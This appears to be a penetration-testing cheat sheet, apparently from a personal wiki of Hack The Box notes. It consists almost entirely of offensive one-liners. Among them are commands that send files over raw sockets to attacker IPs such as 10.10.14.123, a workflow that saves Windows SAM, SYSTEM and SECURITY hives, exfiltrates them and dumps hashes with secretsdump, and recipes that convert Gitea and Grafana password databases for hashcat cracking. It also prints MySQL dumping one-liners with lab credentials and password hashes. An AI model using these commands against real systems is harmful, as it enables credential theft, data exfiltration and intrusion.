Etc

Download file via Python (oneliner)

python -c "import urllib.request; urllib.request.urlretrieve('http://example.com/file.txt', 'file.txt')"

Post file via Python (oneliner)

python -c "import urllib.request, urllib.parse; urllib.request.urlopen(urllib.request.Request('http://example.com/upload', data=urllib.parse.urlencode({'file': open('file.txt', 'rb').read()}).encode()))"

Send file via Python sockets (oneliner)

python -c "import socket; s = socket.socket(); s.connect(('localhost', 8080)); s.sendall(open('file.txt', 'rb').read()); s.close()"

Send file via Powershell sockets

$server = "127.0.0.1"
$port = 8080
$filePath = "file.txt"

$tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port)
$networkStream = $tcpClient.GetStream()
$fileBytes = [System.IO.File]::ReadAllBytes($filePath)
$networkStream.Write($fileBytes, 0, $fileBytes.Length)
$networkStream.Flush()
$networkStream.Close()
$tcpClient.Close()

function SendOverTcp {
    param ([string]$server, $port, $filePath)
    $tcpClient = New-Object Net.Sockets.TcpClient($server, $port)
    $stream = $tcpClient.GetStream()
    $bytes = [IO.File]::ReadAllBytes($filePath)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Close()
    $tcpClient.Close()
}

function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }

SendOverTcp "localhost" 8080 "file.txt"
SendOverTcp "10.10.14.99" 4444 "C:\Program Files (x86)\hMailServer\Database\hMailServer.sdf"

Send file via Linux sockets

cat file.txt > /dev/tcp/IP/PORT
cat file.txt | base64 > /dev/tcp/IP/PORT
---
listen > file.txt
cat file.txt.base64 | base64 -d > file.txt

Hashdump locally with hives

Source: https://gist.github.com/sh1n0b1/8972807

nc -lvnp 4444 > sam.save &
nc -lvnp 4445 > system.save &
nc -lvnp 4446 > security.save &
---
# Save registry keys
reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save

# Exfiltrate registry
function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }
$server = "10.10.14.123";
$port = 4444; $filePath = "C:\users\public\music\sam.save"; SendOverTcp "$server" "$port" "$filePath"
$port = 4445; $filePath = "C:\users\public\music\system.save"; SendOverTcp "$server" "$port" "$filePath"
$port = 4446; $filePath = "C:\users\public\music\security.save"; SendOverTcp "$server" "$port" "$filePath"
---
# Dump via impacket secretsdump
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

Note:Security may not be must?

Hashcat

Gitea to Hashcat

└─$ sqlite3 gitea.db "SELECT REPLACE(name || ':' || 'sha256:50000:' || BASE64(UNHEX(salt)) || ':' || BASE64(UNHEX(passwd)),CHAR(10),'') FROM user"
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

➜ .\hashcat.exe -a 0 -m 10900 .\hashes .\rockyou.txt

Grafana to Hashcat

└─$ sqlite3 grafana.db "SELECT REPLACE('sha256:10000:' || BASE64(CAST(salt AS BLOB)) || ':' || BASE64(UNHEX(password)),CHAR(10),'') FROM user"
sha256:10000:Q0ZuN3pNc1FwZg==:RBpxW9eI6SgXC+eVSxfLGd6DWi3t/ezoxlMnyx2bpr1H1w7bdCGwXZcGumFHy3GXOjQ=
sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=

➜ .\hashcat.exe -a 0 -m 10900 .\hashes .\rockyou.txt

MySQL Enumeration With Language

PHP

PDO

// Get databases
$p=new PDO("mysql:host=db","root","root");foreach($p->query("SHOW DATABASES")as$r)echo$r["Database"]."\n";

// Select database and get tables
$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SHOW TABLES")as$r)echo$r[0]."\n";

// Select database and dump table
$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SELECT * FROM users")as$r)print_r($r)."\n";

(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db","root","root");foreach($p->query("SHOW DATABASES")as$r)echo$r["Database"]."\n";'
cybermonday
information_schema
mysql
performance_schema
sys
webhooks_api
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SHOW TABLES")as$r)echo$r[0]."\n";'
failed_jobs
migrations
password_resets
personal_access_tokens
products
users
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SELECT * FROM users")as$r)print_r($r)."\n";'
Array
(
    [id] => 1
    [0] => 1
    [username] => admin
    [1] => admin
    [email] => admin@cybermonday.htb
    [2] => admin@cybermonday.htb
    [password] => $2y$10$6kJuFazZjtlrAvBNvg4bpO2fQSunL56QFbodCKG6.Qjw87Z8.fYnG
    [3] => $2y$10$6kJuFazZjtlrAvBNvg4bpO2fQSunL56QFbodCKG6.Qjw87Z8.fYnG
    [isAdmin] => 1
    [4] => 1
    [remember_token] =>
    [5] =>
    [created_at] => 2023-05-29 04:10:36
    [6] => 2023-05-29 04:10:36
    [updated_at] => 2023-05-29 04:14:22
    [7] => 2023-05-29 04:14:22
)

MySQLi

$c=new mysqli("172.17.0.1","wp_user","wp_password");foreach($c->query("SHOW DATABASES")as$r){echo $r["Database"]."\n";};$c->close();
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SHOW TABLES")->fetch_all()as$r)echo$r[0]."\n";
# Doesnt include headers
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SELECT * FROM wp_users")->fetch_all()as$r)echo$r[0]."\n";
# Includes headers
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");$q=$c->query("SELECT * FROM wp_users");while($r=$q->fetch_assoc())print_r($r)."\n";

php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password");foreach($c->query("SHOW DATABASES")as$r){echo $r["Database"]."\n";};$c->close();'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SHOW TABLES")->fetch_all()as$r)echo$r[0]."\n";'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SELECT * FROM wp_users")->fetch_all()as$r)echo$r[0]."\n";'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");$q=$c->query("SELECT * FROM wp_users");while($r=$q->fetch_assoc())print_r($r)."\n";'

Python

flask_sqlalchemy

# Get databases
from sqlalchemy import create_engine,text; print([db[0] for db in create_engine('mysql://username:password@host:port/').connect().execute(text('SHOW DATABASES')).fetchall()])

# Get tables
from sqlalchemy import create_engine, text; print([tb[0] for tb in create_engine('mysql://username:password@host:port/database').connect().execute(text('SHOW TABLES')).fetchall()])

# Get rows
from sqlalchemy import create_engine, text; [print(row) for row in create_engine('mysql://username:password@host:port/database').connect().execute(text('SELECT * FROM table')).fetchall()]

atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine,text; print([db[0] for db in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SHOW DATABASES')).fetchall()])"
['SSA', 'information_schema', 'performance_schema']

atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine, text; print([tb[0] for tb in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SHOW TABLES')).fetchall()])"
['users']

atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine, text; [print(row) for row in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SELECT * FROM users')).fetchall()]"
(1, 'Odin', 'pbkdf2:sha256:260000$q0WZMG27Qb6XwVlZ$12154640f87817559bd450925ba3317f93914dc22e2204ac819b90d60018bc1f')
(2, 'silentobserver', 'pbkdf2:sha256:260000$kGd27QSYRsOtk7Zi$0f52e0aa1686387b54d9ea46b2ac97f9ed030c27aac4895bed89cb3a4e09482d')

DiryPipe

ncat -lvnkp PORT | tee FILENAME alternative, was meant to be single liner~: https://gist.github.com/xHacka/984d4c5cbe52e03205e5e5d2460b63ce

PreviousCheatsheets NextLinux

Last updated 8 months ago

hashtagDownload file via Python (oneliner)

hashtagPost file via Python (oneliner)

hashtagSend file via Python sockets (oneliner)

hashtagSend file via Powershell sockets

hashtagSend file via Linux sockets

hashtagHashdump locally with hives

hashtagHashcat

hashtagGitea to Hashcat

hashtagGrafana to Hashcat

hashtagMySQL Enumeration With Language

hashtagPHP

hashtagPython

hashtagDiryPipe